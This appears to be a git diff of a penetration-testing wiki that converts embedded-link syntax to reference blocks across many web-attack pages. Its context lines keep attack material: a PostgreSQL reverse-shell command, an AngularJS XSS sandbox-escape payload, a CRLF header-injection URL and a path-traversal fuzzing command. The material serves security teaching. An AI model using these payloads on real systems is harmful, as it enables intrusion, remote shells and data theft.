b/src/network-services-pentesting/pentesting-web/graphql.md index a92f1630e..3d41fcf66 100644 --- a/src/network-services-pentesting/pentesting-web/graphql.md +++ b/src/network-services-pentesting/pentesting-web/graphql.md @@ -2,7 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - ## Introduction GraphQL is **highlighted** as an **efficient alternative** to REST API, offering a simplified approach for querying data from the backend. In contrast to REST, which often necessitates numerous requests across varied endpoints to gather data, GraphQL enables the fetching of all required information through a **single request**. This streamlining significantly **benefits developers** by diminishing the intricacy of their data fetching processes. @@ -623,7 +622,9 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso ### Automatic Tests -{% embed url="https://graphql-dashboard.herokuapp.com/" %} +{{#ref}} +https://graphql-dashboard.herokuapp.com/ +{{#endref}} - Video explaining AutoGraphQL: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU) @@ -637,8 +638,4 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso - [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696) - [**https://portswigger.net/web-security/graphql**](https://portswigger.net/web-security/graphql) - {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md index 996f5d6d8..2bb6ad07e 100644 --- a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md +++ b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md @@ -43,7 +43,9 @@ Note that even if this was done for AWS machines, it could be done for any other For a better description of this process check: -{% embed url="https://trickest.com/blog/cloudflare-bypass-discover-ip-addresses-aws/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +{{#ref}} +https://trickest.com/blog/cloudflare-bypass-discover-ip-addresses-aws/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks +{{#endref}} ```bash # Find open ports @@ -141,6 +143,3 @@ Find more info about how to do this in the [original article](https://scrapeops. - [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/werkzeug.md b/src/network-services-pentesting/pentesting-web/werkzeug.md index d4e3d0800..aa9242640 100644 --- a/src/network-services-pentesting/pentesting-web/werkzeug.md +++ b/src/network-services-pentesting/pentesting-web/werkzeug.md @@ -2,7 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - ## Console RCE If debug is active you could try to access to `/console` and gain RCE. @@ -162,7 +161,9 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a ## Automated Exploitation -{% embed url="https://github.com/Ruulian/wconsole_extractor" %} +{{#ref}} +https://github.com/Ruulian/wconsole_extractor +{{#endref}} ## References @@ -171,8 +172,4 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a - [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833) - [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python) - {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index 180de8d19..908adea45 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md @@ -249,7 +249,9 @@ This is the response when it doesn't work: ## SSRF -{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %} +{{#ref}} +https://github.com/t0gu/quickpress/blob/master/core/requests.go +{{#endref}} This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them. @@ -435,6 +437,3 @@ Also, **only install trustable WordPress plugins and themes**. - Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses. {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/other-web-tricks.md b/src/other-web-tricks.md index a17d557c7..74a7feac3 100644 --- a/src/other-web-tricks.md +++ b/src/other-web-tricks.md @@ -2,7 +2,6 @@ {{#include ./banners/hacktricks-training.md}} - ### Host header Several times the back-end trust the **Host header** to perform some actions. For example, it could use its value as the **domain to send a password reset**. So when you receive an email with a link to reset your password, the domain being used is the one you put in the Host header.Then, you can request the password reset of other users and change the domain to one controlled by you to steal their password reset codes. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). @@ -10,7 +9,6 @@ Several times the back-end trust the **Host header** to perform some actions. Fo > [!WARNING] > Note that it's possible that you don't even need to wait for the user to click on the reset password link to get the token, as maybe even **spam filters or other intermediary devices/bots will click on it to analyze it**. - ### Session booleans Some times when you complete some verification correctly the back-end will **just add a boolean with the value "True" to a security attribute your session**. Then, a different endpoint will know if you successfully passed that check.\ @@ -26,7 +24,9 @@ Register an email, before confirming it change the email, then, if the new confi ### Access Internal servicedesk of companies using atlassian -{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %} +{{#ref}} +https://yourcompanyname.atlassian.net/servicedesk/customer/user/login +{{#endref}} ### TRACE method @@ -34,7 +34,4 @@ Developers might forget to disable various debugging options in the production e ![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png) - {{#include ./banners/hacktricks-training.md}} - - diff --git a/src/pentesting-web/captcha-bypass.md b/src/pentesting-web/captcha-bypass.md index d8b38e4b4..c2f59772a 100644 --- a/src/pentesting-web/captcha-bypass.md +++ b/src/pentesting-web/captcha-bypass.md @@ -32,9 +32,8 @@ To **bypass** the captcha during **server testing** and automate user input func [**CapSolver**](https://www.capsolver.com/?utm_source=google&utm_medium=ads&utm_campaign=scraping&utm_term=hacktricks&utm_content=captchabypass) is an AI-powered service that specializes in solving various types of captchas automatically, empowers data collection by helping developers easily overcome the captcha challenges encountered during Web Scraping. It supports captchas such as **reCAPTCHA V2, reCAPTCHA V3, DataDome, AWS Captcha, Geetest, and Cloudflare turnstile among others**. For developers, Capsolver offers API integration options detailed in [**documentation**](https://docs.capsolver.com/?utm_source=github&utm_medium=banner_github&utm_campaign=fcsrv)**,** facilitating the integration of captcha solving into applications. They also provide browser extensions for [Chrome](https://chromewebstore.google.com/detail/captcha-solver-auto-captc/pgojnojmmhpofjgdmaebadhbocahppod) and [Firefox](https://addons.mozilla.org/es/firefox/addon/capsolver-captcha-solver/), making it easy to use their service directly within a browser. Different pricing packages are available to accommodate varying needs, ensuring flexibility for users. -{% embed url="https://www.capsolver.com/?utm_campaign=scraping&utm_content=captchabypass&utm_medium=ads&utm_source=google&utm_term=hacktricks" %} +{{#ref}} +https://www.capsolver.com/?utm_campaign=scraping&utm_content=captchabypass&utm_medium=ads&utm_source=google&utm_term=hacktricks +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/client-side-template-injection-csti.md b/src/pentesting-web/client-side-template-injection-csti.md index b127c789b..b21b0bae1 100644 --- a/src/pentesting-web/client-side-template-injection-csti.md +++ b/src/pentesting-web/client-side-template-injection-csti.md @@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - ## Summary It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim's browser. @@ -26,8 +25,7 @@ In scenarios where user input is dynamically inserted into the HTML body tagged You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) and in [**Burp Suite Academy**](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression) -> [!CAUTION] -> [**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work. +> [!CAUTION] > [**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work. ## VueJS @@ -83,10 +81,8 @@ javascript:alert(1)%252f%252f..%252fcss-images ## **Brute-Force Detection List** -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %} - +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 4e6472199..22c1b5279 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - ## What is command Injection? A **command injection** permits the execution of arbitrary operating system commands by an attacker on the server hosting an application. As a result, the application and all its data can be fully compromised. The execution of these commands typically allows the attacker to gain unauthorized access or control over the application's environment and underlying system. @@ -132,7 +131,9 @@ powershell C:**2\n??e*d.*? # notepad ## Brute-Force Detection List -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt +{{#endref}} ## References @@ -140,7 +141,3 @@ powershell C:**2\n??e*d.*? # notepad - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection) {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-web/crlf-0d-0a.md b/src/pentesting-web/crlf-0d-0a.md index 5d697aed3..3fe8460f4 100644 --- a/src/pentesting-web/crlf-0d-0a.md +++ b/src/pentesting-web/crlf-0d-0a.md @@ -2,8 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - - ### CRLF Carriage Return (CR) and Line Feed (LF), collectively known as CRLF, are special character sequences used in the HTTP protocol to denote the end of a line or the start of a new one. Web servers and browsers use CRLF to distinguish between HTTP headers and the body of a response. These characters are universally employed in HTTP/1.1 communications across various web server types, such as Apache and Microsoft IIS. @@ -86,7 +84,9 @@ http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:te Check more examples in: -{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %} +{{#ref}} +https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md +{{#endref}} ### HTTP Header Injection @@ -217,9 +217,4 @@ To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Inj - [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning) - [**https://www.netsparker.com/blog/web-security/crlf-http-header/**](https://www.netsparker.com/blog/web-security/crlf-http-header/) - - {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md index ef056696a..3fc94d3c8 100644 --- a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md +++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md @@ -251,7 +251,9 @@ XS-Search are oriented to **exfiltrate cross-origin information** abusing **side ## Brute-Force Detection List -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt +{{#endref}} ## References @@ -261,6 +263,3 @@ XS-Search are oriented to **exfiltrate cross-origin information** abusing **side - [https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md index 6bf26f494..3dd1faf6e 100644 --- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md +++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md @@ -258,7 +258,9 @@ This vulnerability, identified as CVE-2019–11358, illustrates how a deep copy ### Another tutorial with CVEs -{% embed url="https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2" %} +{{#ref}} +https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2 +{{#endref}} ### Tools to detect Prototype Pollution @@ -392,6 +394,3 @@ To reduce the risk of prototype pollution, the strategies listed below can be em - [https://blog.p6.is/AST-Injection/](https://blog.p6.is/AST-Injection/) {{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md index e9cb95f94..d54afcc85 100644 --- a/src/pentesting-web/file-inclusion/README.md +++ b/src/pentesting-web/file-inclusion/README.md @@ -23,7 +23,9 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../ **Mixing several \*nix LFI lists and adding more paths I have created this one:** -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt +{{#endref}} Try also to change `/` for `\`\ Try also to add `../../../../../` @@ -34,7 +36,9 @@ A list that uses several techniques to find the file /etc/password (to check if Merge of different wordlists: -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt +{{#endref}} Try also to change `/` for `\`\ Try also to remove `C:/` and add `../../../../../` @@ -689,6 +693,3 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha {% file src="../../images/EN-Local-File-Inclusion-1.pdf" %} {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/file-inclusion/phar-deserialization.md b/src/pentesting-web/file-inclusion/phar-deserialization.md index dd45a5d7b..9a45d0c5e 100644 --- a/src/pentesting-web/file-inclusion/phar-deserialization.md +++ b/src/pentesting-web/file-inclusion/phar-deserialization.md @@ -2,8 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - - **Phar** files (PHP Archive) files **contain meta data in serialized format**, so, when parsed, this **metadata** is **deserialized** and you can try to abuse a **deserialization** vulnerability inside the **PHP** code. The best thing about this characteristic is that this deserialization will occur even using PHP functions that do not eval PHP code like **file_get_contents(), fopen(), file() or file_exists(), md5_file(), filemtime() or filesize()**. @@ -69,11 +67,8 @@ php vuln.php ### References -{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %} - - +{{#ref}} +https://blog.ripstech.com/2018/new-php-exploitation-technique/ +{{#endref}} {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md index c313ba80c..4653b285e 100644 --- a/src/pentesting-web/file-upload/README.md +++ b/src/pentesting-web/file-upload/README.md @@ -2,7 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - ## File Upload General Methodology Other useful extensions: @@ -200,7 +199,9 @@ Here’s a top 10 list of things that you can achieve by uploading (from [here]( #### Burp Extension -{% embed url="https://github.com/portswigger/upload-scanner" %} +{{#ref}} +https://github.com/portswigger/upload-scanner +{{#endref}} ## Magic Header Bytes @@ -325,8 +326,4 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie - [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) - [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a) - {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/hacking-jwt-json-web-tokens.md b/src/pentesting-web/hacking-jwt-json-web-tokens.md index 75f00b0a4..3338e3983 100644 --- a/src/pentesting-web/hacking-jwt-json-web-tokens.md +++ b/src/pentesting-web/hacking-jwt-json-web-tokens.md @@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - **Part of this post is based in the awesome post:** [**https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology)\ **Author of the great tool to pentest JWTs** [**https://github.com/ticarpi/jwt_tool**](https://github.com/ticarpi/jwt_tool) @@ -245,7 +244,9 @@ However, imagine a situation where the maximun length of the ID is 4 (0001-9999) ### JWT Registered claims -{% embed url="https://www.iana.org/assignments/jwt/jwt.xhtml#claims" %} +{{#ref}} +https://www.iana.org/assignments/jwt/jwt.xhtml#claims +{{#endref}} ### Other attacks @@ -263,9 +264,8 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are ### Tools -{% embed url="https://github.com/ticarpi/jwt_tool" %} - +{{#ref}} +https://github.com/ticarpi/jwt_tool +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/pentesting-web/ldap-injection.md b/src/pentesting-web/ldap-injection.md index cd74a92e1..a85346847 100644 --- a/src/pentesting-web/ldap-injection.md +++ b/src/pentesting-web/ldap-injection.md @@ -4,7 +4,6 @@ {{#include ../banners/hacktricks-training.md}} - ## LDAP Injection ### **LDAP** @@ -216,10 +215,8 @@ intitle:"phpLDAPadmin" inurl:cmd.php ### More Payloads -{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %} - +{{#ref}} +https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md index 34a0c2763..cf7454fea 100644 --- a/src/pentesting-web/oauth-to-account-takeover.md +++ b/src/pentesting-web/oauth-to-account-takeover.md @@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - ## Basic Information OAuth offers various versions, with foundational insights accessible at [OAuth 2.0 documentation](https://oauth.net/2/). This discussion primarily centers on the widely used [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/), providing an **authorization framework that enables an application to access or perform actions on a user's account in another application** (the authorization server). @@ -158,7 +157,9 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ For more detailed info about how to abuse AWS cognito check: -{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum" %} +{{#ref}} +https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum +{{#endref}} ### Abusing other Apps tokens @@ -231,8 +232,4 @@ If the platform you are testing is an OAuth provider [**read this to test for po - [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1) - [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors) - {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md index 2fdfdf809..ad7c79c0b 100644 --- a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md +++ b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md @@ -241,9 +241,8 @@ xslt-server-side-injection-extensible-stylesheet-language-transformations.md ## Brute-Force Detection List -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md index 4a77964ae..4ed8e022f 100644 --- a/src/pentesting-web/sql-injection/README.md +++ b/src/pentesting-web/sql-injection/README.md @@ -2,7 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - ## What is SQL injection? An **SQL injection** is a security flaw that allows attackers to **interfere with database queries** of an application. This vulnerability can enable attackers to **view**, **modify**, or **delete** data they shouldn't access, including information of other users or any data the application can access. Such actions may result in permanent changes to the application's functionality or content or even compromision of the server or denial of service. @@ -143,7 +142,9 @@ Also, if you have access to the output of the query, you could make it **print t ### Identifying with PortSwigger -{% embed url="https://portswigger.net/web-security/sql-injection/cheat-sheet" %} +{{#ref}} +https://portswigger.net/web-security/sql-injection/cheat-sheet +{{#endref}} ## Exploiting Union Based @@ -282,7 +283,6 @@ We have already discussed all the ways to exploit a SQL Injection vulnerability. Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) - ## Authentication bypass List to try to bypass the login functionality: @@ -533,7 +533,9 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup ### WAF bypass suggester tools -{% embed url="https://github.com/m4ll0k/Atlas" %} +{{#ref}} +https://github.com/m4ll0k/Atlas +{{#endref}} ## Other Guides @@ -542,10 +544,9 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup ## Brute-Force Detection List -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt +{{#endref}} ​ {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md index a671e3d11..451278260 100644 --- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md +++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md @@ -135,7 +135,9 @@ SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"'); You can find this **library precompiled** to several different PostgreSQL versions and even can **automate this process** (if you have PostgreSQL access) with: -{% embed url="https://github.com/Dionach/pgexec" %} +{{#ref}} +https://github.com/Dionach/pgexec +{{#endref}} ### RCE in Windows @@ -351,6 +353,3 @@ print(" drop function connect_back(text, integer);") - [https://www.exploit-db.com/papers/13084](https://www.exploit-db.com/papers/13084) {{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/README.md b/src/pentesting-web/ssrf-server-side-request-forgery/README.md index 834ebe83d..4233fbf8d 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/README.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/README.md @@ -369,7 +369,9 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP ### To practice -{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %} +{{#ref}} +https://github.com/incredibleindishell/SSRF_Vulnerable_Lab +{{#endref}} ## References @@ -379,7 +381,3 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP - [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md index 79b63fe79..d3e850c2e 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md @@ -167,7 +167,9 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) can generate vari Check out the [**URL validation bypass cheat sheet** webapp](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet) from portswigger were you can introduce the allowed host and the attackers one and it'll generate a list of URLs to try for you. It also considers if you can use the URL in a parameter, in a Host header or in a CORS header. -{% embed url="https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet" %} +{{#ref}} +https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet +{{#endref}} ### Bypass via redirect @@ -221,6 +223,3 @@ image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing- - [https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet](https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md index dc06dcbe5..9dc05dac3 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/README.md +++ b/src/pentesting-web/ssti-server-side-template-injection/README.md @@ -2,7 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - ## What is SSTI (Server-Side Template Injection) Server-side template injection is a vulnerability that occurs when an attacker can inject malicious code into a template that is executed on the server. This vulnerability can be found in various technologies, including Jinja. @@ -466,8 +465,6 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1 - More info in [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) - - ## ### Smarty (PHP) @@ -1097,7 +1094,9 @@ If you think it could be useful, read: ## Brute-Force Detection List -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt +{{#endref}} ## Practice & References @@ -1106,6 +1105,3 @@ If you think it could be useful, read: - [https://portswigger.net/web-security/server-side-template-injection](https://portswigger.net/web-security/server-side-template-injection) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/unicode-injection/unicode-normalization.md b/src/pentesting-web/unicode-injection/unicode-normalization.md index 365ba43cc..a1664d6d0 100644 --- a/src/pentesting-web/unicode-injection/unicode-normalization.md +++ b/src/pentesting-web/unicode-injection/unicode-normalization.md @@ -79,7 +79,9 @@ Then, a malicious user could insert a different Unicode character equivalent to #### sqlmap template -{% embed url="https://github.com/carlospolop/sqlmap_to_unicode_template" %} +{{#ref}} +https://github.com/carlospolop/sqlmap_to_unicode_template +{{#endref}} ### XSS (Cross Site Scripting) @@ -104,6 +106,3 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t - [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md index dbe25179b..544fc742e 100644 --- a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md +++ b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md @@ -418,7 +418,9 @@ version="1.0"> ## **Brute-Force Detection List** -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt +{{#endref}} ## **References** @@ -427,6 +429,3 @@ version="1.0"> - [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf) {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md index 86cdd77a6..f8a1f5f0b 100644 --- a/src/pentesting-web/xss-cross-site-scripting/README.md +++ b/src/pentesting-web/xss-cross-site-scripting/README.md @@ -1,6 +1,5 @@ # XSS (Cross Site Scripting) - ## Methodology 1. Check if **any value you control** (_parameters_, _path_, _headers_?, _cookies_?) is being **reflected** in the HTML or **used** by **JS** code. @@ -1550,7 +1549,9 @@ shadow-dom.md ### Polyglots -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt +{{#endref}} ### Blind XSS payloads @@ -1619,7 +1620,9 @@ console.log( ### Brute-Force List -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt +{{#endref}} ## XSS Abusing other vulnerabilities @@ -1741,8 +1744,4 @@ other-js-tricks.md - [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec) - [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html) - {{#include ../../banners/hacktricks-training.md}} - - - diff --git 